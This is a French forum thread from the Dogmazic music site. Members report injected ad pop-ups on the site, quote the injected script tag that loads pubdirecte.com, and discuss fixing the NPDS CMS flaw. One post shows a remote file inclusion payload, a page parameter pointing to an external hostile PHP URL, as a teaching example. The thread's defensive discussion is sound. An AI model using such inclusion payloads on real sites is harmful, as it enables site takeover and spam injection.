Pour nous contacter : soyez au rendez-vous sur IRC ! ⋅ Parcourir l'archive musicale Dogmazic ⋅ Notre Blog ⋅ Notre Documentation
Bonjour à tous,

Le forum Musique Libre a migré !

Pas d'inquiétude, vos comptes et vos messages ont été migré ! Mais nous n'avons pas pu migrer les mots de passe, il vous faudra donc cliquer sur "J’ai oublié mon mot de passe" et suivre la procédure.

Welcome back ;)

Alerte au hack

Développement, suggestions, à venir, tout ce qui concerne le site.
Avatar de l’utilisateur
shangril
Messages : 3025
Inscription : 13 oct. 2010, 19:18

Alerte au hack

Message par shangril »

Vite fait,

Je vais voir un fil que je suis. Je clique sur le logo DZ pour revenir à l'index.

Pop up de pub.

Pour reproduire, j'ai effacé mes cookies récents et refait la manip. À nouveau, pop-up de pub.
Avatar de l’utilisateur
shangril
Messages : 3025
Inscription : 13 oct. 2010, 19:18

Re: Alerte au hack

Message par shangril »

Dans le code de la page, vers la fin :

Code : Tout sélectionner

?>
<script src="http://www.pubdirecte.com/script/pop.php?id=40006&ref=16979"></script>
Dj_Quality
Messages : 37
Inscription : 10 juil. 2007, 22:57

Re: Alerte au hack

Message par Dj_Quality »

Salut shangril, je confirme divers problèmes du style !

Hier soir, pendant 10 minutes environ (mais je ne saurais plus dire vers quelle heure exactement), à chaque tentative d'accès à Dogmazic (page d'accueil ou lien direct vers une page spécifique), j'étais redirigé vers l'un ou l'autre site de publicité au bout de moins de 3 secondes !!!!!!

Aujourd'hui, après environ 1 heure passée sur le site, j'ai eu un popup de publicité!

Cette fois-ci, ils y ont été plus fort. Le hack semble également perturber la mise en page (volet de gauche répété 2 fois + bout de fin balise mal formée en bas de page).

Par contre, je ne vois plus les liens publicitaires (de couleur noire) qui traînaient toujours en bas de chaque page depuis plusieurs mois.

Il faut vraiment faire quelque chose ! Passer à la nouvelle version de NPDS impliquerait beaucoup de travail pour implémentation du spécifique Dogmazic ? Sinon, il faudrait essayer de corriger toutes les failles NPDS connues de la version actuelle et si ça ne suffit pas, essayer de localiser la ou les pages que les hackers utilisent pour effectuer leurs injections de code nuisible.

Pourquoi faut-il toujours que certains viennent s'amuser à saboter l'excellent travail des autres, juste pour le plaisir ? :evil:
Dj_Quality
Messages : 37
Inscription : 10 juil. 2007, 22:57

Re: Alerte au hack

Message par Dj_Quality »

Ah ! J'oubliais !

Je confirme également la disparition de la colonne de droite !

A mon avis, l'attaque XSS n'était pas tout à fait au point cette fois... Maudits hackers !

Le site de développement semble intact...
Avatar de l’utilisateur
shangril
Messages : 3025
Inscription : 13 oct. 2010, 19:18

Re: Alerte au hack

Message par shangril »

J'ai fait un whois sur Pubdirecte.com ; il n'y a pas d'enregistrement de ce nom de domaine dans Whois, théoriquement il pointe sur une adresse IP invalide (une adresse de réseau privé) ; pourtant ce matin il m'a bel et bien balancé la pub. Je suis pas retourné voir pour savoir si pubdirecte.com est toujours bel et bien en ligne ; en fait j'ai édité mon fichier host pour faire pointer ce domaine sur 127.0.0.1, comme ça ça le bloque.
Avatar de l’utilisateur
shangril
Messages : 3025
Inscription : 13 oct. 2010, 19:18

Re: Alerte au hack

Message par shangril »

(au fait, salut Dj_Quality)

Il faut absolument éradiquer ce hack ! À cause peut-être de la balise fermante ?> qui a été ajoutée (quoique en fait je sais pas) un certain nombre de pages du sites ne montrent plus qu'une page blanche et rien d'autre dans la colonne du milieu. J'ai constaté ça sur la page de la radio et la page 'gérer vos playlists'.
Avatar de l’utilisateur
shangril
Messages : 3025
Inscription : 13 oct. 2010, 19:18

Re: Alerte au hack

Message par shangril »

Peut-être une piste :

-remplacer footer.php à la racine du site par un fichier footer.php fait maison qui contiendrait en fait uniquement du code statique pour Google Analytics et piwIkTracker

-enlever le code malicieux que j'ai mentionné précédemment du bloc principal des pages Dogmazic.

Si j'ai bien compris, le hack consiste à passer une url forgée dans ce but à Footer.php qui permet l'inclusion de code arbitraire à la fin du bloc principal du site.

Donc, en désactivant complètement l'actuel footer.php qui est livré avec ndps de la manière que je viens de décrire, la faille de sécurité devrait être supprimée.

Inconvénient, il ne sera alors certainement plus possible d'éditer le footer (pied de page) via l'interface de npds, il faudra aller placer le code directement dans le footer.php fait maison.
Dj_Quality
Messages : 37
Inscription : 10 juil. 2007, 22:57

Re: Alerte au hack

Message par Dj_Quality »

Salut shangril !


En fait, j'avais posté, il y a quelques temps, ce message sur le forum : "Piste pour la résolution du problème de bas de page...". Je sais que Sebkha-Chott s'était, à l'époque, penché sur le problème et avait résolu divers soucis !

Sauf s'il s'agit d'une réécriture d'URL, "/themes/2004/footer.php" semble toujours exister et pourrait être une des causes de l'inclusion d'éléments indésirables dans les pages du site. Si l'utilisation du contenu de variables pouvant être fournies de l'extérieur (via GET/POST ou même un simple COOKIE) a été sécurisée (échappement, élimination des balises PHP/HTML, ...) à 100 % dans la page, c'est également en ordre.

L'ennui, c'est qu'à partir de n'importe quelle page vulnérable du site, une attaque XSS bien menée peut permettre d'ajouter de nouvelles pages, de remplacer/inclure du code dans d'autres, éventuellement prendre le contrôle total de la base de données, ... Une bonne connaissance du fonctionnement et de la structure de NPDS peut évidemment rendre la tâche beaucoup plus facile aux hackers... Une bonne connaissance des failles de sécurité de la version utilisée peut les aider aussi...

Tant que l'ensemble des pages vulnérables ne sera pas sécurisé/éliminé (si plus nécessaire), réparer les dégats ne servira malheureusement à rien (ou juste pour le très court terme), car dès que les hackers s'en rendront compte, ils recommenceront leur attaque !

Pour le nettoyage du site, cela peut rester assez simple, télécharger l'ensemble des fichiers du portail (version de production) et les comparer avec l'ensemble des fichiers de la version saine (avant la dernière publication) en utilisant Meld, WinMerge ou un outil du genre. Cela permettra de voir rapidement les fichiers ajoutés/modifiés.

Pour trouver via quelle(s) page(s), ils procèdent à leurs attaquent, il faut premièrement rechercher la liste des failles connues, propres à la version de NPDS utilisée et les corriger. Ensuite, analyser les logs d'accès sur le serveur (vers le 9 décembre au soir et/ou le 10 vers 13h00, apparemment) pour essayer d'identifier s'ils utilisent bien une des pages vulnérables connues ou s'ils s'amusent avec une autre... Ca c'est beaucoup moins facile, vu le volume de visiteurs sur Dogmazic, surtout s'ils utilisent une faille non-publiée ! Enfin, il faut corriger toutes les pages vulnérables connues/décelées et Dogmazic devrait pouvoir être immunisé contre ces attaques scandaleuses et nuisibles.

shangril, tu as parfaitement compris la technique d'attaque XSS, mais comme expliqué plus haut, cela peut très bien ne pas être footer.php ou le footer.php d'un thème, cela peut être fait à partir de n'importe qu'elle page vulnérable !

Bon, là, c'est très gros, mais un des pires trucs que tu puisses faire en PHP, c'est faire un include d'une page passée en paramètre GET/POST sans vérifier qu'il ne s'agit pas d'une URL externe. Exemple, tu as une jolie page index.php à laquelle tu envoies la page à inclure comme suit : index.php?page=contacts.html
Le hacker va simplement passer : index.php?page=http://www.tutesfaitavoir.fr/hacks/nuisible.php
Je te laisse imaginer le résultat... Tu peux te retrouver avec un tout nouveau site, un système de spam dernière génération ou autre...
Avatar de l’utilisateur
explicite
Messages : 391
Inscription : 01 nov. 2006, 19:13

Re: Alerte au hack

Message par explicite »

Pfff... :( Et c'est r'parti... ("TELECHARGER TOUS SUR MEGAUPLOAD")
Avatar de l’utilisateur
shangril
Messages : 3025
Inscription : 13 oct. 2010, 19:18

Re: Alerte au hack

Message par shangril »

Je vois rien chez moi.
Répondre